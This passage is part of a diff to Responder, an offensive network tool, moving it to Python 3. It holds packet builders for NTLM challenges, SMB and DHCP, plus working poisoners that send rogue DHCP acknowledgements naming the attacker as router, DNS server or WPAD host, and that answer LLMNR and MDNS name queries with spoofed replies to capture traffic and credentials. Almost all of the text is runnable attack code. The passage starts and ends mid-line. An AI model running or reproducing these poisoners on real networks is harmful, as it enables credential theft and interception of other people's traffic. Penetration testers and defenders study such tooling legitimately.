dressOpcode"])+str(self.fields["TowerIPAddressBC2"])+str(self.fields["TowerIPAddressStr"]) + + self.fields["Data"] = Data + +class NTLMChallenge(Packet): + fields = OrderedDict([ + ("NTLMSSPSignature", "NTLMSSP"), + ("NTLMSSPSignatureNull", "\x00"), + ("NTLMSSPMessageType", "\x02\x00\x00\x00"), + ("NTLMSSPNtWorkstationLen", "\x1e\x00"), + ("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"), + ("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"), + ("NTLMSSPNtNegotiateFlags", "\x15\x82\x8a\xe2"), + ("NTLMSSPNtServerChallenge", "\x81\x22\x33\x34\x55\x46\xe7\x88"), + ("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"), + ("NTLMSSPNtTargetInfoLen", "\x94\x00"), + ("NTLMSSPNtTargetInfoMaxLen", "\x94\x00"), + ("NTLMSSPNtTargetInfoBuffOffset", "\x56\x00\x00\x00"), + ("NegTokenInitSeqMechMessageVersionHigh", "\x05"), + ("NegTokenInitSeqMechMessageVersionLow", "\x02"), + ("NegTokenInitSeqMechMessageVersionBuilt", "\xce\x0e"), + ("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"), + ("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"), + ("NTLMSSPNtWorkstationName", settings.Config.Domain), + ("NTLMSSPNTLMChallengeAVPairsId", "\x02\x00"), + ("NTLMSSPNTLMChallengeAVPairsLen", "\x0a\x00"), + ("NTLMSSPNTLMChallengeAVPairsUnicodeStr", settings.Config.Domain), + ("NTLMSSPNTLMChallengeAVPairs1Id", "\x01\x00"), + ("NTLMSSPNTLMChallengeAVPairs1Len", "\x1e\x00"), + ("NTLMSSPNTLMChallengeAVPairs1UnicodeStr", settings.Config.MachineName), + ("NTLMSSPNTLMChallengeAVPairs2Id", "\x04\x00"), + ("NTLMSSPNTLMChallengeAVPairs2Len", "\x1e\x00"), + ("NTLMSSPNTLMChallengeAVPairs2UnicodeStr", settings.Config.MachineName+'.'+settings.Config.DomainName), + ("NTLMSSPNTLMChallengeAVPairs3Id", "\x03\x00"), + ("NTLMSSPNTLMChallengeAVPairs3Len", "\x1e\x00"), + ("NTLMSSPNTLMChallengeAVPairs3UnicodeStr", settings.Config.DomainName), + ("NTLMSSPNTLMChallengeAVPairs5Id", "\x05\x00"), + ("NTLMSSPNTLMChallengeAVPairs5Len", "\x04\x00"), + ("NTLMSSPNTLMChallengeAVPairs5UnicodeStr", settings.Config.DomainName), + ("NTLMSSPNTLMChallengeAVPairs6Id", "\x00\x00"), + ("NTLMSSPNTLMChallengeAVPairs6Len", "\x00\x00"), + ]) + + def calculate(self): + ###### Convert strings to Unicode first + self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le').decode('latin-1') + self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le').decode('latin-1') + self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le').decode('latin-1') + self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le').decode('latin-1') + self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le').decode('latin-1') + self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le').decode('latin-1') + + ###### Workstation Offset + CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]) + ###### AvPairs Offset + CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"]) + + ##### Workstation Offset Calculation: + self.fields["NTLMSSPNtWorkstationBuffOffset"] = StructWithLenPython2or3("h",len(DataGramLen)) + +class SMBTransMailslot(Packet): + fields = OrderedDict([ + ("Wordcount", "\x11"), + ("TotalParamCount", "\x00\x00"), + ("TotalDataCount", "\x00\x00"), + ("MaxParamCount", "\x02\x00"), + ("MaxDataCount", "\x00\x00"), + ("MaxSetupCount", "\x00"), + ("Reserved", "\x00"), + ("Flags", "\x00\x00"), + ("Timeout", "\xff\xff\xff\xff"), + ("Reserved2", "\x00\x00"), + ("ParamCount", "\x00\x00"), + ("ParamOffset", "\x00\x00"), + ("DataCount", "\x00\x00"), + ("DataOffset", "\x00\x00"), + ("SetupCount", "\x03"), + ("Reserved3", "\x00"), + ("Opcode", "\x01\x00"), + ("Priority", "\x00\x00"), + ("Class", "\x02\x00"), + ("Bcc", "\x00\x00"), + ("MailSlot", "\\MAILSLOT\\NET\\NETLOGON"), + ("MailSlotNull", "\x00"), + ("Padding", "\x00\x00\x00"), + ("Data", ""), + ]) + + def calculate(self): + #Padding + if len(str(self.fields["Data"]))%2==0: + self.fields["Padding"] = "\x00\x00\x00\x00" + else: + self.fields["Padding"] = "\x00\x00\x00" + BccLen = str(self.fields["MailSlot"])+str(self.fields["MailSlotNull"])+str(self.fields["Padding"])+str(self.fields["Data"]) + PacketOffsetLen = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved2"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved3"])+str(self.fields["Opcode"])+str(self.fields["Priority"])+str(self.fields["Class"])+str(self.fields["Bcc"])+str(self.fields["MailSlot"])+str(self.fields["MailSlotNull"])+str(self.fields["Padding"]) + + self.fields["DataCount"] = StructWithLenPython2or3(". +import sys +if (sys.version_info < (3, 0)): + sys.exit('This script is meant to be run with Python3') + +import struct +import random +import optparse +import configparser +import os +import codecs +import netifaces +import binascii + +BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..')) +sys.path.insert(0, BASEDIR) +from odict import OrderedDict +from utils import * + +def color(txt, code = 1, modifier = 0): + return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) + +#Python version +if (sys.version_info > (3, 0)): + PY2OR3 = "PY3" +else: + PY2OR3 = "PY2" + +def StructWithLenPython2or3(endian,data): + #Python2... + if PY2OR3 == "PY2": + return struct.pack(endian, data) + #Python3... + else: + return struct.pack(endian, data).decode('latin-1') + +def NetworkSendBufferPython2or3(data): + if PY2OR3 == "PY2": + return str(data) + else: + return bytes(str(data), 'latin-1') + +def NetworkRecvBufferPython2or3(data): + if PY2OR3 == "PY2": + return str(data) + else: + return str(data.decode('latin-1')) + +class Packet(): + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) + +config = configparser.ConfigParser() +config.read(os.path.join(BASEDIR,'Responder.conf')) +RespondTo = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')] if _f] +DontRespondTo = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')] if _f] +Interface = settings.Config.Interface +Responder_IP = RespondWithIP() +ROUTERIP = Responder_IP # Set to Responder_IP in case we fall on a static IP network and we don't get a DHCP Offer. This var will be updated with the real dhcp IP if present. +NETMASK = "255.255.255.0" +DNSIP = "0.0.0.0" +DNSIP2 = "0.0.0.0" +DNSNAME = "local" +WPADSRV = "http://"+Responder_IP+"/wpad.dat" +Respond_To_Requests = True +DHCPClient = [] + +def GetMacAddress(Interface): + try: + mac = netifaces.ifaddresses(Interface)[netifaces.AF_LINK][0]['addr'] + return binascii.unhexlify(mac.replace(':', '')).decode('latin-1') + except: + mac = "00:00:00:00:00:00" + return binascii.unhexlify(mac.replace(':', '')).decode('latin-1') + +##### IP Header ##### +class IPHead(Packet): + fields = OrderedDict([ + ("Version", "\x45"), + ("DiffServices", "\x00"), + ("TotalLen", "\x00\x00"), + ("Ident", "\x00\x00"), + ("Flags", "\x00\x00"), + ("TTL", "\x40"), + ("Protocol", "\x11"), + ("Checksum", "\x00\x00"), + ("SrcIP", ""), + ("DstIP", ""), + ]) + +class UDP(Packet): + fields = OrderedDict([ + ("SrcPort", "\x00\x43"), + ("DstPort", "\x00\x44"), + ("Len", "\x00\x00"), + ("Checksum", "\x00\x00"), + ("Data", "\x00\x00"), + ]) + + def calculate(self): + self.fields["Len"] = StructWithLenPython2or3(">h",len(str(self.fields["Data"]))+8) + +class DHCPDiscover(Packet): + fields = OrderedDict([ + ("MessType", "\x01"), + ("HdwType", "\x01"), + ("HdwLen", "\x06"), + ("Hops", "\x00"), + ("Tid", os.urandom(4).decode('latin-1')), + ("ElapsedSec", "\x00\x01"), + ("BootpFlags", "\x80\x00"), + ("ActualClientIP", "\x00\x00\x00\x00"), + ("GiveClientIP", "\x00\x00\x00\x00"), + ("NextServerIP", "\x00\x00\x00\x00"), + ("RelayAgentIP", "\x00\x00\x00\x00"), + ("ClientMac", os.urandom(6).decode('latin-1')),#Needs to be random. + ("ClientMacPadding", "\x00" *10), + ("ServerHostname", "\x00" * 64), + ("BootFileName", "\x00" * 128), + ("MagicCookie", "\x63\x82\x53\x63"), + ("DHCPCode", "\x35"), #DHCP Message + ("DHCPCodeLen", "\x01"), + ("DHCPOpCode", "\x01"), #Msgtype(Discover) + ("Op55", "\x37"), + ("Op55Len", "\x0b"), + ("Op55Str", "\x01\x03\x0c\x0f\x06\x1a\x21\x79\x77\x2a\x78"),#Requested info. + ("Op12", "\x0c"), + ("Op12Len", "\x09"), + ("Op12Str", settings.Config.DHCPHostname),#random str. + ("Op255", "\xff"), + ("Padding", "\x00"), + ]) + + def calculate(self): + self.fields["ClientMac"] = GetMacAddress(Interface) + +class DHCPACK(Packet): + fields = OrderedDict([ + ("MessType", "\x02"), + ("HdwType", "\x01"), + ("HdwLen", "\x06"), + ("Hops", "\x00"), + ("Tid", "\x11\x22\x33\x44"), + ("ElapsedSec", "\x00\x00"), + ("BootpFlags", "\x00\x00"), + ("ActualClientIP", "\x00\x00\x00\x00"), + ("GiveClientIP", "\x00\x00\x00\x00"), + ("NextServerIP", "\x00\x00\x00\x00"), + ("RelayAgentIP", "\x00\x00\x00\x00"), + ("ClientMac", "\xff\xff\xff\xff\xff\xff"), + ("ClientMacPadding", "\x00" *10), + ("ServerHostname", "\x00" * 64), + ("BootFileName", "\x00" * 128), + ("MagicCookie", "\x63\x82\x53\x63"), + ("DHCPCode", "\x35"), #DHCP Message + ("DHCPCodeLen", "\x01"), + ("DHCPOpCode", "\x05"), #Msgtype(ACK) + ("Op54", "\x36"), + ("Op54Len", "\x04"), + ("Op54Str", ""), #DHCP Server + ("Op51", "\x33"), + ("Op51Len", "\x04"), + ("Op51Str", "\x00\x00\x00\x0a"), #Lease time + ("Op1", "\x01"), + ("Op1Len", "\x04"), + ("Op1Str", ""), #Netmask + ("Op15", "\x0f"), + ("Op15Len", "\x0e"), + ("Op15Str", ""), #DNS Name + ("Op3", "\x03"), + ("Op3Len", "\x04"), + ("Op3Str", ""), #Router + ("Op6", "\x06"), + ("Op6Len", "\x08"), + ("Op6Str", ""), #DNS Servers + ("Op252", ""), + ("Op252Len", ""), + ("Op252Str", ""), #Wpad Server + ("Op255", "\xff"), + ("Padding", "\x00"), + ]) + + def calculate(self, DHCP_DNS): + self.fields["Op54Str"] = socket.inet_aton(ROUTERIP).decode('latin-1') + self.fields["Op1Str"] = socket.inet_aton(NETMASK).decode('latin-1') + self.fields["Op3Str"] = socket.inet_aton(ROUTERIP).decode('latin-1') + self.fields["Op6Str"] = socket.inet_aton(DNSIP).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1') + self.fields["Op15Str"] = DNSNAME + if DHCP_DNS: + self.fields["Op6Str"] = socket.inet_aton(RespondWithIP()).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1') + else: + self.fields["Op252"] = "\xfc" + self.fields["Op252Str"] = WPADSRV + self.fields["Op252Len"] = StructWithLenPython2or3(">b",len(str(self.fields["Op252Str"]))) + + self.fields["Op51Str"] = StructWithLenPython2or3('>L', random.randrange(10, 20)) + self.fields["Op15Len"] = StructWithLenPython2or3(">b",len(str(self.fields["Op15Str"]))) + +def RespondToThisIP(ClientIp): + if ClientIp.startswith('127.0.0.'): + return False + elif RespondTo and ClientIp not in RespondTo: + return False + elif ClientIp in RespondTo or RespondTo == []: + if ClientIp not in DontRespondTo: + return True + return False + +def ParseSrcDSTAddr(data): + SrcIP = socket.inet_ntoa(data[0][26:30]) + DstIP = socket.inet_ntoa(data[0][30:34]) + SrcPort = struct.unpack('>H',data[0][34:36])[0] + DstPort = struct.unpack('>H',data[0][36:38])[0] + return SrcIP, SrcPort, DstIP, DstPort + +def FindIP(data): + IPPos = data.find(b"\x32\x04") + 2 + if IPPos == -1 or IPPos + 4 >= len(data) or IPPos == 1: + #Probably not present in the DHCP options we received, let's grab it from the IP header instead + return data[12:16] + else: + IP = data[IPPos:IPPos+4] + return IP + +def ParseDHCPCode(data, ClientIP,DHCP_DNS): + global DHCPClient + global ROUTERIP + PTid = data[4:8] + Seconds = data[8:10] + CurrentIP = socket.inet_ntoa(data[12:16]) + RequestedIP = socket.inet_ntoa(data[16:20]) + MacAddr = data[28:34] + MacAddrStr = ':'.join('%02x' % ord(m) for m in MacAddr.decode('latin-1')).upper() + OpCode = data[242:243] + RequestIP = data[245:249] + + if DHCPClient.count(MacAddrStr) >= 4: + return "'%s' has been poisoned more than 4 times. Ignoring..." % MacAddrStr + + if OpCode == b"\x02" and Respond_To_Requests: # DHCP Offer + ROUTERIP = ClientIP + return 'Found DHCP server IP: %s, now waiting for incoming requests...' % (ROUTERIP) + + elif OpCode == b"\x03" and Respond_To_Requests: # DHCP Request + IP = FindIP(data) + if IP: + IPConv = socket.inet_ntoa(IP) + if RespondToThisIP(IPConv): + IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1')) + Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), ElapsedSec=Seconds.decode('latin-1')) + Packet.calculate(DHCP_DNS) + Buffer = UDP(Data = Packet) + Buffer.calculate() + SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68)) + DHCPClient.append(MacAddrStr) + SaveDHCPToDb({ + 'MAC': MacAddrStr, + 'IP': CurrentIP, + 'RequestedIP': IPConv, + }) + return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, IPConv, MacAddrStr) + + # DHCP Inform + elif OpCode == b"\x08": + IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=socket.inet_aton(CurrentIP).decode('latin-1')) + Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), ActualClientIP=socket.inet_aton(CurrentIP).decode('latin-1'), + GiveClientIP=socket.inet_aton("0.0.0.0").decode('latin-1'), + NextServerIP=socket.inet_aton("0.0.0.0").decode('latin-1'), + RelayAgentIP=socket.inet_aton("0.0.0.0").decode('latin-1'), + ElapsedSec=Seconds.decode('latin-1')) + Packet.calculate(DHCP_DNS) + Buffer = UDP(Data = Packet) + Buffer.calculate() + SendDHCP(str(IP_Header)+str(Buffer), (CurrentIP, 68)) + DHCPClient.append(MacAddrStr) + SaveDHCPToDb({ + 'MAC': MacAddrStr, + 'IP': CurrentIP, + 'RequestedIP': RequestedIP, + }) + return 'Acknowledged DHCP Inform for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, RequestedIP, MacAddrStr) + + elif OpCode == b"\x01" and Respond_To_Requests: # DHCP Discover + IP = FindIP(data) + if IP: + IPConv = socket.inet_ntoa(IP) + if RespondToThisIP(IPConv): + IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1')) + Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), DHCPOpCode="\x02", ElapsedSec=Seconds.decode('latin-1')) + Packet.calculate(DHCP_DNS) + Buffer = UDP(Data = Packet) + Buffer.calculate() + SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0)) + DHCPClient.append(MacAddrStr) + SaveDHCPToDb({ + 'MAC': MacAddrStr, + 'IP': CurrentIP, + 'RequestedIP': IPConv, + }) + return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, IPConv, MacAddrStr) + +def SendDiscover(): + s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) + s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) + IP_Header = IPHead(SrcIP = socket.inet_aton('0.0.0.0').decode('latin-1'), DstIP=socket.inet_aton('255.255.255.255').decode('latin-1')) + Packet = DHCPDiscover() + Packet.calculate() + Buffer = UDP(SrcPort="\x00\x44", DstPort="\x00\x43",Data = Packet) + Buffer.calculate() + s.sendto(NetworkSendBufferPython2or3(str(IP_Header)+str(Buffer)), ('255.255.255.255', 67)) + +def SendDHCP(packet,Host): + s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) + s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) + s.sendto(NetworkSendBufferPython2or3(packet), Host) + +def DHCP(DHCP_DNS): + s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW) + s.bind((Interface, 0x0800)) + SendDiscover() + while True: + data = s.recvfrom(65535) + if data[0][23:24] == b"\x11":# is udp? + SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data) + if SrcPort == 67 or DstPort == 67: + ClientIP = socket.inet_ntoa(data[0][26:30]) + ret = ParseDHCPCode(data[0][42:], ClientIP,DHCP_DNS) + if ret and not settings.Config.Quiet_Mode: + print(text("[*] [DHCP] %s" % ret)) diff --git a/poisoners/LLMNR.py b/poisoners/LLMNR.py old mode 100644 new mode 100755 index ef375d9..25e020e --- a/poisoners/LLMNR.py +++ b/poisoners/LLMNR.py @@ -14,32 +14,40 @@ # # You should have received a copy of the GNU General Public License # along with this program. If not, see . -import struct -import fingerprint - -from packets import LLMNR_Ans -from SocketServer import BaseRequestHandler +from packets import LLMNR_Ans, LLMNR6_Ans from utils import * +if (sys.version_info > (3, 0)): + from socketserver import BaseRequestHandler +else: + from SocketServer import BaseRequestHandler + +#Should we answer to those AAAA? +Have_IPv6 = settings.Config.IPv6 def Parse_LLMNR_Name(data): - NameLen = struct.unpack('>B',data[12])[0] - return data[13:13+NameLen] - + import codecs + NameLen = data[12] + if (sys.version_info > (3, 0)): + return data[13:13+NameLen] + else: + NameLen2 = int(codecs.encode(NameLen, 'hex'), 16) + return data[13:13+int(NameLen2)] def IsICMPRedirectPlausible(IP): dnsip = [] - for line in file('/etc/resolv.conf', 'r'): - ip = line.split() - if len(ip) < 2: - continue - elif ip[0] == 'nameserver': - dnsip.extend(ip[1:]) - for x in dnsip: - if x != "127.0.0.1" and IsOnTheSameSubnet(x,IP) is False: - print color("[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5) - print color("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5) - print color("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5) + with open('/etc/resolv.conf', 'r') as file: + for line in file: + ip = line.split() + if len(ip) < 2: + continue + elif ip[0] == 'nameserver': + dnsip.extend(ip[1:]) + for x in dnsip: + if x != "127.0.0.1" and IsIPv6IP(x) is False and IsOnTheSameSubnet(x,IP) is False: #Temp fix to ignore IPv6 DNS addresses + print(color("[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5)) + print(color("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5)) + print(color("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5)) if settings.Config.AnalyzeMode: IsICMPRedirectPlausible(settings.Config.Bind_To) @@ -47,39 +55,71 @@ if settings.Config.AnalyzeMode: class LLMNR(BaseRequestHandler): # LLMNR Server class def handle(self): - data, soc = self.request - Name = Parse_LLMNR_Name(data) + try: + data, soc = self.request + Name = Parse_LLMNR_Name(data).decode("latin-1") + if settings.Config.AnswerName is None: + AnswerName = Name + else: + AnswerName = settings.Config.AnswerName + LLMNRType = Parse_IPV6_Addr(data) - # Break out if we don't want to respond to this host - if RespondToThisHost(self.client_address[0], Name) is not True: - return None + # Break out if we don't want to respond to this host + if RespondToThisHost(self.client_address[0].replace("::ffff:",""), Name) is not True: + return None + #IPv4 + if data[2:4] == b'\x00\x00' and LLMNRType: + if settings.Config.AnalyzeMode: + LineHeader = "[Analyze mode: LLMNR]" + print(color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1)) + SavePoisonersToDb({ + 'Poisoner': 'LLMNR', + 'SentToIp': self.client_address[0], + 'ForName': Name, + 'AnalyzeMode': '1', + }) - if data[2:4] == "\x00\x00" and Parse_IPV6_Addr(data): - Finger = None - if settings.Config.Finger_On_Off: - Finger = fingerprint.RunSmbFinger((self.client_address[0], 445)) + elif LLMNRType == True: # Poisoning Mode + #Default: + if settings.Config.TTL == None: + Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName) + else: + Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName, TTL=settings.Config.TTL) + Buffer1.calculate() + soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address) + if not settings.Config.Quiet_Mode: + LineHeader = "[*] [LLMNR]" + if settings.Config.AnswerName is None: + print(color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1)) + else: + print(color("%s Poisoned answer sent to %s for name %s (spoofed answer name %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, AnswerName), 2, 1)) + SavePoisonersToDb({ + 'Poisoner': 'LLMNR', + 'SentToIp': self.client_address[0], + 'ForName': Name, + 'AnalyzeMode': '0', + }) - if settings.Config.AnalyzeMode: - LineHeader = "[Analyze mode: LLMNR]" - print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1) - SavePoisonersToDb({ - 'Poisoner': 'LLMNR', - 'SentToIp': self.client_address[0], - 'ForName': Name, - 'AnalyzeMode': '1', - }) - else: # Poisoning Mode - Buffer = LLMNR_Ans(Tid=data[0:2], QuestionName=Name, AnswerName=Name) - Buffer.calculate() - soc.sendto(str(Buffer), self.client_address) - LineHeader = "[*] [LLMNR]" - print color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0], Name), 2, 1) - SavePoisonersToDb({ - 'Poisoner': 'LLMNR', - 'SentToIp': self.client_address[0], - 'ForName': Name, - 'AnalyzeMode': '0', - }) - if Finger is not None: - print text("[FINGER] OS Version : %s" % color(Finger[0], 3)) - print text("[FINGER] Client Version : %s" % color(Finger[1], 3)) + elif LLMNRType == 'IPv6' and Have_IPv6: + #Default: + if settings.Config.TTL == None: + Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName) + else: + Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName, TTL=settings.Config.TTL) + Buffer1.calculate() + soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address) + if not settings.Config.Quiet_Mode: + LineHeader = "[*] [LLMNR]" + if settings.Config.AnswerName is None: + print(color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1)) + else: + print(color("%s Poisoned answer sent to %s for name %s (spoofed answer name %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, AnswerName), 2, 1)) + SavePoisonersToDb({ + 'Poisoner': 'LLMNR6', + 'SentToIp': self.client_address[0], + 'ForName': Name, + 'AnalyzeMode': '0', + }) + + except: + pass diff --git a/poisoners/MDNS.py b/poisoners/MDNS.py old mode 100644 new mode 100755 index 6fdc537..3ef0c7c --- a/poisoners/MDNS.py +++ b/poisoners/MDNS.py @@ -15,60 +15,96 @@ # You should have received a copy of the GNU General Public License # along with this program. If not, see . import struct - -from SocketServer import BaseRequestHandler -from packets import MDNS_Ans +import sys +if (sys.version_info > (3, 0)): + from socketserver import BaseRequestHandler +else: + from SocketServer import BaseRequestHandler +from packets import MDNS_Ans, MDNS6_Ans from utils import * +#Should we answer to those AAAA? +Have_IPv6 = settings.Config.IPv6 + def Parse_MDNS_Name(data): try: - data = data[12:] - NameLen = struct.unpack('>B',data[0])[0] - Name = data[1:1+NameLen] - NameLen_ = struct.unpack('>B',data[1+NameLen])[0] - Name_ = data[1+NameLen:1+NameLen+NameLen_+1] - return Name+'.'+Name_ + if (sys.version_info > (3, 0)): + data = data[12:] + NameLen = data[0] + Name = data[1:1+NameLen] + NameLen_ = data[1+NameLen] + Name_ = data[1+NameLen:1+NameLen+NameLen_+1] + FinalName = Name+b'.'+Name_ + return FinalName.decode("latin-1").replace("\x05","") + else: + data = NetworkRecvBufferPython2or3(data[12:]) + NameLen = struct.unpack('>B',data[0])[0] + Name = data[1:1+NameLen] + NameLen_ = struct.unpack('>B',data[1+NameLen])[0] + Name_ = data[1+NameLen:1+NameLen+NameLen_+1] + return Name+'.'+Name_.replace("\x05","") + except IndexError: return None def Poisoned_MDNS_Name(data): - data = data[12:] + data = NetworkRecvBufferPython2or3(data[12:]) return data[:len(data)-5] class MDNS(BaseRequestHandler): def handle(self): - MADDR = "224.0.0.251" - MPORT = 5353 - - data, soc = self.request - Request_Name = Parse_MDNS_Name(data) - - # Break out if we don't want to respond to this host - if (not Request_Name) or (RespondToThisHost(self.client_address[0], Request_Name) is not True): - return None - - if settings.Config.AnalyzeMode: # Analyze Mode - if Parse_IPV6_Addr(data): - print text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0], 3), color(Request_Name, 3))) - SavePoisonersToDb({ - 'Poisoner': 'MDNS', - 'SentToIp': self.client_address[0], - 'ForName': Request_Name, - 'AnalyzeMode': '1', - }) - else: # Poisoning Mode - if Parse_IPV6_Addr(data): + try: + data, soc = self.request + Request_Name = Parse_MDNS_Name(data) + MDNSType = Parse_IPV6_Addr(data) + # Break out if we don't want to respond to this host + + if (not Request_Name) or (RespondToThisHost(self.client_address[0].replace("::ffff:",""), Request_Name) is not True): + return None + if settings.Config.AnalyzeMode: # Analyze Mode + print(text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0].replace("::ffff:",""), 3), color(Request_Name, 3)))) + SavePoisonersToDb({ + 'Poisoner': 'MDNS', + 'SentToIp': self.client_address[0], + 'ForName': Request_Name, + 'AnalyzeMode': '1', + }) + elif MDNSType == True: # Poisoning Mode Poisoned_Name = Poisoned_MDNS_Name(data) - Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=RespondWithIPAton()) + #Use default: + if settings.Config.TTL == None: + Buffer = 